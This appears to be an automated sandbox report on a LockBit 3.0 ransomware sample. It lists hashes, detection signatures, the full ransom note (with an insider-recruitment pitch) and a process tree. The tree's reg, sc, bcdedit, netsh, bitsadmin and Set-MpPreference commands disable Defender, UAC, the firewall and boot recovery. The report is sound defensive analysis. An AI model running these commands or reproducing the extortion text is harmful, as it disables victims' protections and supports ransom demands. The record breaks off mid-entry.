lockbit | d002302a8e120ce7e4ec31a84c1e630e6a95bc0845552d956022f9e179a3509e

Analysis

max time kernel
145s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
01/08/2023, 01:58

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

eVZbWhFl.ps1
Size

220KB
MD5

f312dd218a7a6e5ccb480c3435f35692
SHA1

33390cb7941a2a06ef563ac3d715afa64083e3fc
SHA256

d002302a8e120ce7e4ec31a84c1e630e6a95bc0845552d956022f9e179a3509e
SHA512

fc006bb211127552fafeb0248113d9426180809a18e31cd9b34a83ff429f11b59743166c778592ead1e141cad92873a6a525257fab1e57dbce338468df6cc56e
SSDEEP

6144:Y3jQazsl9Orcxx81kcLI8bBYivQmFH4d1l:yjpwkeLcLI8dYHmFHi1l

Score

10^/10

lockbit evasion ransomware spyware stealer trojan

Malware Config

Extracted

Path

C:\fg1nrax2U.README.txt

Family

lockbit

Ransom Note

~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~ >>>> Your data are stolen and encrypted The data will be published on TOR website if you do not pay the ransom >>>> What guarantees that we will not deceive you? We are not a politically motivated group and we do not need anything other than your money. If you pay, we will provide you the programs for decryption and we will delete your data. Life is too short to be sad. Be not sad, money, it is only paper. If we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future. Therefore to us our reputation is very important. We attack the companies worldwide and there is no dissatisfied victim after payment. You can obtain information about us on twitter https://twitter.com/hashtag/lockbit?f=live >>>> You need contact us and decrypt one file for free on these TOR sites with your personal DECRYPTION ID Download and install TOR Browser https://www.torproject.org/ Write to a chat and wait for the answer, we will always answer you. Sometimes you will need to wait for our answer because we attack many companies. If you do not get an answer in the chat room for a long time, the site does not work and in any other emergency, you can contact us in jabber or tox. >>>> Your personal DECRYPTION ID: 095A437114C72F35AB404B6EC1AD6CD6 >>>> Warning! Do not DELETE or MODIFY any files, it can lead to recovery problems! >>>> Warning! If you do not pay the ransom we will attack your company repeatedly again! >>>> Advertisement Would you like to earn millions of dollars $$$ ? Our company acquire access to networks of various companies, as well as insider information that can help you steal the most valuable data of any company. You can provide us accounting data for the access to any company, for example, login and password to RDP, VPN, corporate email, etc. Open our letter at your email. Launch the provided virus on any computer in your company. You can do it both using your work computer or the computer of any other employee in order to divert suspicion of being in collusion with us. Companies pay us the foreclosure for the decryption of files and prevention of data leak. You can contact us using Tox messenger without registration and SMS https://tox.chat/download.html. Using Tox messenger, we will never know your real name, it means your privacy is guaranteed. If you want to contact us, write in jabber or tox. If this contact is expired, and we do not respond you, look for the relevant contact data on our website via Tor or Brave browser

URLs

https://twitter.com/hashtag/lockbit?f=live

https://tox.chat/download.html

Signatures

Lockbit
Ransomware family with multiple variants released since late 2019.
ransomware lockbit

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Rule to detect Lockbit 3.0 ransomware Windows payload 3 IoCs

resource	yara_rule
behavioral1/files/0x0007000000023212-164.dat	family_lockbit
behavioral1/files/0x0007000000023214-409.dat	family_lockbit
behavioral1/files/0x0007000000023214-410.dat	family_lockbit

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	powershell.exe

Renames multiple (626) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
2168	netsh.exe

Executes dropped EXE 13 IoCs

pid	Process
5028	MinSudo.exe
4772	MinSudo.exe
1048	MinSudo.exe
1240	MinSudo.exe
2044	MinSudo.exe
988	MinSudo.exe
1092	MinSudo.exe
3992	MinSudo.exe
4936	MinSudo.exe
1428	MinSudo.exe
3800	MinSudo.exe
4220	n8gPh5FKmGRU.exe
856	6E90.tmp

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops desktop.ini file(s) 2 IoCs

description	ioc	Process
File opened for modification	C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\desktop.ini	n8gPh5FKmGRU.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-1722984668-1829624581-3022101259-1000\desktop.ini	n8gPh5FKmGRU.exe

Process spawned suspicious child process 1 IoCs

This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE is not expected to spawn this process	4228	60	DW20.EXE	167

Drops file in System32 directory 5 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{82794BDE-43D3-4732-8795-F409C8C14281}.catalogItem	svchost.exe
File created	C:\Windows\system32\spool\PRINTERS\00002.SPL	splwow64.exe
File created	C:\Windows\system32\spool\PRINTERS\PP932god1rc03q6g0pstimq25rb.TMP	printfilterpipelinesvc.exe
File created	C:\Windows\system32\spool\PRINTERS\PP98e4an3yu95cfzrg4m296ap9.TMP	printfilterpipelinesvc.exe
File created	C:\Windows\system32\spool\PRINTERS\PP6bzeae0epx1p123cmh27pl6n.TMP	printfilterpipelinesvc.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\fg1nrax2U.bmp"	n8gPh5FKmGRU.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\fg1nrax2U.bmp"	n8gPh5FKmGRU.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

pid	Process
4220	n8gPh5FKmGRU.exe
4220	n8gPh5FKmGRU.exe
4220	n8gPh5FKmGRU.exe
4220	n8gPh5FKmGRU.exe
856	6E90.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
4228	bitsadmin.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Control Panel\Desktop	n8gPh5FKmGRU.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Control Panel\Desktop\WallpaperStyle = "10"	n8gPh5FKmGRU.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.fg1nrax2U	n8gPh5FKmGRU.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.fg1nrax2U\ = "fg1nrax2U"	n8gPh5FKmGRU.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\fg1nrax2U\DefaultIcon	n8gPh5FKmGRU.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\fg1nrax2U	n8gPh5FKmGRU.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\fg1nrax2U\DefaultIcon\ = "C:\\ProgramData\\fg1nrax2U.ico"	n8gPh5FKmGRU.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4148	powershell.exe
4148	powershell.exe
2144	powershell.exe
2144	powershell.exe
2144	powershell.exe
5028	MinSudo.exe
5028	MinSudo.exe
4772	MinSudo.exe
4772	MinSudo.exe
1048	MinSudo.exe
1048	MinSudo.exe
1240	MinSudo.exe
1240	MinSudo.exe
2044	MinSudo.exe
2044	MinSudo.exe
988	MinSudo.exe
988	MinSudo.exe
1092	MinSudo.exe
1092	MinSudo.exe
3992	MinSudo.exe
3992	MinSudo.exe
4936	MinSudo.exe
4936	MinSudo.exe
552	powershell.exe
552	powershell.exe
552	powershell.exe
1428	MinSudo.exe
1428	MinSudo.exe
3800	MinSudo.exe
3800	MinSudo.exe
4312	powershell.exe
4312	powershell.exe
4312	powershell.exe
3372	powershell.exe
3372	powershell.exe
3372	powershell.exe
3120	powershell.exe
3120	powershell.exe
3120	powershell.exe
864	powershell.exe
864	powershell.exe
864	powershell.exe
2148	powershell.exe
2148	powershell.exe
2148	powershell.exe
3744	powershell.exe
3744	powershell.exe
3744	powershell.exe
2392	powershell.exe
2392	powershell.exe
2392	powershell.exe
4636	powershell.exe
4636	powershell.exe
4636	powershell.exe
1668	powershell.exe
1668	powershell.exe
1668	powershell.exe
864	powershell.exe
864	powershell.exe
864	powershell.exe
4220	n8gPh5FKmGRU.exe
4220	n8gPh5FKmGRU.exe
4220	n8gPh5FKmGRU.exe
4220	n8gPh5FKmGRU.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4148	powershell.exe
Token: SeDebugPrivilege	2144	powershell.exe
Token: SeDebugPrivilege	5028	MinSudo.exe
Token: SeDebugPrivilege	4772	MinSudo.exe
Token: SeDebugPrivilege	1048	MinSudo.exe
Token: SeDebugPrivilege	1240	MinSudo.exe
Token: SeDebugPrivilege	2044	MinSudo.exe
Token: SeDebugPrivilege	988	MinSudo.exe
Token: SeDebugPrivilege	1092	MinSudo.exe
Token: SeDebugPrivilege	3992	MinSudo.exe
Token: SeDebugPrivilege	4936	MinSudo.exe
Token: SeDebugPrivilege	552	powershell.exe
Token: SeDebugPrivilege	1428	MinSudo.exe
Token: SeDebugPrivilege	3800	MinSudo.exe
Token: SeDebugPrivilege	4312	powershell.exe
Token: SeDebugPrivilege	3372	powershell.exe
Token: SeDebugPrivilege	3120	powershell.exe
Token: SeDebugPrivilege	864	powershell.exe
Token: SeDebugPrivilege	2148	powershell.exe
Token: SeDebugPrivilege	3744	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	4636	powershell.exe
Token: SeDebugPrivilege	1668	powershell.exe
Token: SeDebugPrivilege	864	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeBackupPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeDebugPrivilege	4220	n8gPh5FKmGRU.exe
Token: 36	4220	n8gPh5FKmGRU.exe
Token: SeImpersonatePrivilege	4220	n8gPh5FKmGRU.exe
Token: SeIncBasePriorityPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeIncreaseQuotaPrivilege	4220	n8gPh5FKmGRU.exe
Token: 33	4220	n8gPh5FKmGRU.exe
Token: SeManageVolumePrivilege	4220	n8gPh5FKmGRU.exe
Token: SeProfSingleProcessPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeRestorePrivilege	4220	n8gPh5FKmGRU.exe
Token: SeSecurityPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeSystemProfilePrivilege	4220	n8gPh5FKmGRU.exe
Token: SeTakeOwnershipPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeShutdownPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeDebugPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeBackupPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeBackupPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeSecurityPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeSecurityPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeBackupPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeBackupPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeSecurityPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeSecurityPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeBackupPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeBackupPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeSecurityPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeSecurityPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeBackupPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeBackupPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeSecurityPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeSecurityPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeBackupPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeBackupPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeSecurityPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeSecurityPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeBackupPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeBackupPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeSecurityPrivilege	4220	n8gPh5FKmGRU.exe
Token: SeSecurityPrivilege	4220	n8gPh5FKmGRU.exe

Suspicious use of SetWindowsHookEx 10 IoCs

pid	Process
60	ONENOTE.EXE
60	ONENOTE.EXE
60	ONENOTE.EXE
60	ONENOTE.EXE
60	ONENOTE.EXE
60	ONENOTE.EXE
60	ONENOTE.EXE
60	ONENOTE.EXE
60	ONENOTE.EXE
60	ONENOTE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4148 wrote to memory of 4208	4148	powershell.exe	87
PID 4148 wrote to memory of 4208	4148	powershell.exe	87
PID 4208 wrote to memory of 3428	4208	csc.exe	88
PID 4208 wrote to memory of 3428	4208	csc.exe	88
PID 4148 wrote to memory of 4500	4148	powershell.exe	89
PID 4148 wrote to memory of 4500	4148	powershell.exe	89
PID 4500 wrote to memory of 4964	4500	cmd.exe	90
PID 4500 wrote to memory of 4964	4500	cmd.exe	90
PID 4500 wrote to memory of 2848	4500	cmd.exe	91
PID 4500 wrote to memory of 2848	4500	cmd.exe	91
PID 4500 wrote to memory of 4228	4500	cmd.exe	98
PID 4500 wrote to memory of 4228	4500	cmd.exe	98
PID 4500 wrote to memory of 2144	4500	cmd.exe	105
PID 4500 wrote to memory of 2144	4500	cmd.exe	105
PID 4500 wrote to memory of 5028	4500	cmd.exe	107
PID 4500 wrote to memory of 5028	4500	cmd.exe	107
PID 4500 wrote to memory of 4772	4500	cmd.exe	108
PID 4500 wrote to memory of 4772	4500	cmd.exe	108
PID 4500 wrote to memory of 1048	4500	cmd.exe	109
PID 4500 wrote to memory of 1048	4500	cmd.exe	109
PID 4500 wrote to memory of 1240	4500	cmd.exe	110
PID 4500 wrote to memory of 1240	4500	cmd.exe	110
PID 4500 wrote to memory of 2044	4500	cmd.exe	111
PID 4500 wrote to memory of 2044	4500	cmd.exe	111
PID 4500 wrote to memory of 988	4500	cmd.exe	112
PID 4500 wrote to memory of 988	4500	cmd.exe	112
PID 4500 wrote to memory of 1092	4500	cmd.exe	113
PID 4500 wrote to memory of 1092	4500	cmd.exe	113
PID 4500 wrote to memory of 3992	4500	cmd.exe	114
PID 4500 wrote to memory of 3992	4500	cmd.exe	114
PID 4500 wrote to memory of 4936	4500	cmd.exe	115
PID 4500 wrote to memory of 4936	4500	cmd.exe	115
PID 4500 wrote to memory of 552	4500	cmd.exe	116
PID 4500 wrote to memory of 552	4500	cmd.exe	116
PID 4500 wrote to memory of 1428	4500	cmd.exe	117
PID 4500 wrote to memory of 1428	4500	cmd.exe	117
PID 4500 wrote to memory of 3800	4500	cmd.exe	118
PID 4500 wrote to memory of 3800	4500	cmd.exe	118
PID 4500 wrote to memory of 4312	4500	cmd.exe	119
PID 4500 wrote to memory of 4312	4500	cmd.exe	119
PID 4500 wrote to memory of 3372	4500	cmd.exe	120
PID 4500 wrote to memory of 3372	4500	cmd.exe	120
PID 4500 wrote to memory of 3120	4500	cmd.exe	121
PID 4500 wrote to memory of 3120	4500	cmd.exe	121
PID 4500 wrote to memory of 864	4500	cmd.exe	122
PID 4500 wrote to memory of 864	4500	cmd.exe	122
PID 4500 wrote to memory of 2148	4500	cmd.exe	123
PID 4500 wrote to memory of 2148	4500	cmd.exe	123
PID 4500 wrote to memory of 3744	4500	cmd.exe	124
PID 4500 wrote to memory of 3744	4500	cmd.exe	124
PID 4500 wrote to memory of 2392	4500	cmd.exe	126
PID 4500 wrote to memory of 2392	4500	cmd.exe	126
PID 4500 wrote to memory of 4636	4500	cmd.exe	127
PID 4500 wrote to memory of 4636	4500	cmd.exe	127
PID 4500 wrote to memory of 1668	4500	cmd.exe	128
PID 4500 wrote to memory of 1668	4500	cmd.exe	128
PID 4500 wrote to memory of 864	4500	cmd.exe	129
PID 4500 wrote to memory of 864	4500	cmd.exe	129
PID 864 wrote to memory of 2168	864	powershell.exe	130
PID 864 wrote to memory of 2168	864	powershell.exe	130
PID 4500 wrote to memory of 232	4500	cmd.exe	131
PID 4500 wrote to memory of 232	4500	cmd.exe	131
PID 4500 wrote to memory of 1660	4500	cmd.exe	132
PID 4500 wrote to memory of 1660	4500	cmd.exe	132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\eVZbWhFl.ps1
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4148
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pp2kvx0x\pp2kvx0x.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4208
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8F6F.tmp" "c:\Users\Admin\AppData\Local\Temp\pp2kvx0x\CSC488FD4394ED7436CAD10511732311B1.TMP"
    3⤵
    PID:3428
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\2058761778\AZaXE6ObqtQH.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4500
- - C:\Windows\system32\cacls.exe
    "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
    3⤵
    PID:4964
- - C:\Windows\system32\wscript.exe
    wscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs
    3⤵
    PID:2848
- - C:\Windows\system32\bitsadmin.exe
    bitsadmin /transfer Explorers /download /priority FOREGROUND http://github.com/M2Team/NanaRun/releases/download/1.0.18.0/NanaRun_1.0_Preview2_1.0.18.0.zip C:\Nana.zip
    3⤵
    - Download via BitsAdmin
    PID:4228
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell expand-archive C:\Nana.zip
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2144
- - C:\Users\Admin\AppData\Local\Temp\Nana\x64\MinSudo.exe
    MinSudo --NoLogo --verbose --System icacls "C:\Windows\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5028
- - C:\Users\Admin\AppData\Local\Temp\Nana\x64\MinSudo.exe
    MinSudo --NoLogo --verbose --System reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4772
- - C:\Users\Admin\AppData\Local\Temp\Nana\x64\MinSudo.exe
    MinSudo --NoLogo --verbose --System reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1048
- - C:\Users\Admin\AppData\Local\Temp\Nana\x64\MinSudo.exe
    MinSudo --NoLogo --verbose --System reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1240
- - C:\Users\Admin\AppData\Local\Temp\Nana\x64\MinSudo.exe
    MinSudo --NoLogo --verbose --System reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t REG_DWORD /d "1" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2044
- - C:\Users\Admin\AppData\Local\Temp\Nana\x64\MinSudo.exe
    MinSudo --NoLogo --verbose --System reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:988
- - C:\Users\Admin\AppData\Local\Temp\Nana\x64\MinSudo.exe
    MinSudo --NoLogo --verbose --System reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d "1" /f
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1092
- - C:\Users\Admin\AppData\Local\Temp\Nana\x64\MinSudo.exe
    MinSudo --NoLogo --verbose --System sc stop windefend
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3992
- - C:\Users\Admin\AppData\Local\Temp\Nana\x64\MinSudo.exe
    MinSudo --NoLogo --verbose --System sc delete windefend
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4936
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:552
- - C:\Users\Admin\AppData\Local\Temp\Nana\x64\MinSudo.exe
    MinSudo --NoLogo --verbose --System bcdedit /set {default} recoveryenabled No
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1428
- - C:\Users\Admin\AppData\Local\Temp\Nana\x64\MinSudo.exe
    MinSudo --NoLogo --verbose --System bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3800
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4312
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
    3⤵
    - UAC bypass
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3372
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe "Set-MpPreference -EnableControlledFolderAccess Disabled"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3120
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe "Set-MpPreference -PUAProtection disable"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:864
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe "Set-MpPreference -HighThreatDefaultAction 6 -Force"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2148
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe "Set-MpPreference -ModerateThreatDefaultAction 6"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3744
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe "Set-MpPreference -LowThreatDefaultAction 6"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2392
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe "Set-MpPreference -SevereThreatDefaultAction 6"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4636
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe "Set-MpPreference -ScanScheduleDay 8"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1668
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe "netsh advfirewall set allprofiles state off"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:864
  - - C:\Windows\system32\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
      4⤵
      Modifies Windows Firewall
      PID:2168
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    3⤵
    PID:232
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    3⤵
    PID:1660
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
    3⤵
    PID:4396
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    3⤵
    PID:3772
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2524
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2680
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2616
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3508
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1836
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    3⤵
    PID:4572
- - C:\Windows\system32\reg.exe
